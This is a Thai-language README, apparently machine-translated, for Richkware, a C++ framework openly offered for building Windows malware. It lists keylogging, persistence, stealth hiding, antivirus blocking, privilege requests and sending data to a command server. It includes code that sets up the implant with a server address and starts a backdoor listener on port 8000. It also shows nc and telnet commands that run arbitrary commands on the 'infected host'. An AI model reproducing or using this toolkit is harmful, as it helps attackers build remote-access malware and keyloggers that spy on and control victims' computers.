Richkware

เฟรมเวิร์กสำหรับการสร้างมัลแวร์ Windows เขียนด้วย C ++

Richkware เป็นไลบรารีของฟังก์ชั่นเครือข่ายและระบบปฏิบัติการที่คุณสามารถใช้เพื่อสร้างมัลแวร์ องค์ประกอบของฟังก์ชั่นเหล่านี้อนุญาตให้แอปพลิเคชันถือว่าพฤติกรรมที่อ้างอิงถึงมัลแวร์ประเภทต่อไปนี้:

• ไวรัส
• หนอน
• บอท
• สปายแวร์
• คีย์ล็อกเกอร์
• แผลเป็น

Richkware-Manager-Server: บริการสำหรับการจัดการโฮสต์ที่นำเสนออินสแตนซ์ของมัลแวร์ที่พัฒนาขึ้นโดยใช้ Richkware Framework

Richkware-Manager-client: ไคลเอนต์ของ Richkware-Manager-Server ที่ได้รับรายการโฮสต์ทั้งหมดจากเซิร์ฟเวอร์และสามารถส่งคำสั่งใด ๆ ให้พวกเขาได้

• Server ( Network.h ): โมดูลสำหรับการจัดการเซิร์ฟเวอร์มัลติเธรดที่อนุญาตให้รับคำสั่งจากอินเทอร์เน็ต (Richkware-Manager-client หรือคอนโซล) ตามโปรโตคอลเฉพาะ
  • โปรโตคอล ( protocol.h ):
    1. การดำเนินการคำสั่งจากระยะไกล (ID 1)
    2. (ทำงานอยู่ระหว่างดำเนินการ)
• Network ( Network.h ):
  • RawRequest : ส่งคำขอไปยังเซิร์ฟเวอร์;
  • UploadInFotorichkWaremanagerserver : ส่งข้อมูลไปยัง Richkware-Manager-Server

• Storage ( Storage.h ):

  • Savesession and LoadSession : บันทึกสถานะแอปพลิเคชัน (เข้ารหัส) ถึง:
    • ลงทะเบียน (SaveValuereg และ LoadValuereg)
    • ไฟล์ (saveValuetofile และ loadvaluefromfile)
  • การคงอยู่ : ติดตั้งตัวเองอย่างถาวรในระบบ

• isadmin และ requestadminprivileges ( richkware.h ): ตรวจสอบและต้องการสิทธิ์ของผู้ดูแลระบบ;

• StealthWindow ( Richkware.h ): ซ่อนแอปพลิเคชัน;

• OpenApp ( Richkware.h ): เปิดแอปพลิเคชันโดยพลการ;

• keylogger ( richkware.h ): เก็บในไฟล์ปุ่มกดทั้งหมด;

• BlockApps E UnblockApps ( blockapps.h ): แอปพลิเคชันบล็อกและปลดล็อค (Antivirus, ... )

• เข้ารหัสและถอดรหัส ( crypto.h ): RC4 (ค่าเริ่มต้น), blowfish
• เข้ารหัสและถอดรหัส ( crypto.h ): base64 (defualt), hex

• Randmouse ( Richkware.h ): เลื่อนเคอร์เซอร์เมาส์แบบสุ่ม
• ไฮเบอร์เนต ( Richkware.h ): ระบบไฮเบอร์เนต

นี่คือข้อกำหนดพื้นฐานในการสร้างและใช้ Richkware:

• ทำหรือ cmake
• Mingw

เปิด main.cpp และสร้างอินสแตนซ์ของ Richkware

หากคุณได้ปรับใช้ RMS คุณสามารถเริ่มต้นมัลแวร์ได้ดังนี้:

    int main() {
           Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
            ...
            return 0;
        }

ว่าได้รับคีย์ที่ปลอดภัยจาก Richkware-Manager-Server และตั้งค่าคีย์เป็นคีย์การเข้ารหัส DefaultPass ใช้เป็นคีย์การเข้ารหัสชั่วคราวเพื่อให้แน่ใจว่าการสื่อสารที่ปลอดภัยกับ RMS และหากมัลแวร์ไม่สามารถเข้าถึง RMS เพื่อรับ KET การเข้ารหัสมันจะใช้ DefaultPass เป็นปุ่มเข้ารหัส

มิฉะนั้นหากคุณยังไม่ได้ปรับใช้ RMS คุณสามารถใช้:

 Richkware richkware("Richk","richktest");

ด้วยวิธีนี้มันใช้ "RichkTest" เป็นคีย์การเข้ารหัส

หลังจากการใช้งาน Main.CPP คุณสามารถรวบรวมได้ดังนี้

 make

• c/c ++> preprocessor> คำจำกัดความของตัวประมวลผลล่วงหน้าเพิ่ม "_crt_secure_no_warnings"
• linker> อินพุต> การพึ่งพาเพิ่มเติมเพิ่ม "ws2_32.lib"

ในตัวอย่างต่อไปนี้เราเรียกว่า " เซิร์ฟเวอร์ " มัลแวร์ที่พัฒนาขึ้นโดยใช้ Richkware Framework และที่เปิดใช้งานฟังก์ชั่นสำหรับการสร้างเซิร์ฟเวอร์และ " ไคลเอนต์ " ผู้สร้าง (แฮ็กเกอร์) ของมัลแวร์ที่พยายามสร้างการเชื่อมต่อกับพีซีที่ติดเชื้อ

ฟังก์ชั่นการเรียกใช้งาน Framework Starterver ใน Main มันเริ่มต้นเซิร์ฟเวอร์บนพอร์ตในตัวอย่างต่อไปนี้คือพอร์ต TCP 8000 โปรดจำไว้ว่าหากมีการใช้พอร์ตโดยโปรแกรมอื่นแล้วคุณจะไม่สามารถใช้พอร์ตนั้นได้จนกว่าโปรแกรมจะหยุด

 int main () {
    ...
	richkware.network.server.Start("8000");
    ...
}

ในทุกระบบที่ติดตั้งเครื่องเสมือน Java คุณสามารถใช้ Richkware-Manager-client มิฉะนั้นถ้าไม่ปรากฏคุณสามารถใช้เทอร์มินัลได้อย่างง่ายดาย

ในระบบ UNIX คุณสามารถใช้ NETCAT และเรียกใช้คำสั่งต่อไปนี้:

 nc <serverName> 8000

หากเซิร์ฟเวอร์ได้รับคำขอในพอร์ตเปิดและประสบความสำเร็จในการสร้างการเชื่อมต่อมันจะตอบสนองต่อไคลเอนต์ยืนยันการจัดตั้งการเชื่อมต่อหลังจากนั้นคุณสามารถเขียน:

 [[1]]COMMAND

คำสั่ง คือคำสั่งที่จะต้องดำเนินการบนโฮสต์ที่ติดเชื้อที่เซิร์ฟเวอร์กำลังทำงานอยู่

ใน Windows คุณสามารถใช้ Telnet ได้ในลักษณะเดียวกัน:

 telnet <serverName> 8000

-

 [[1]]COMMAND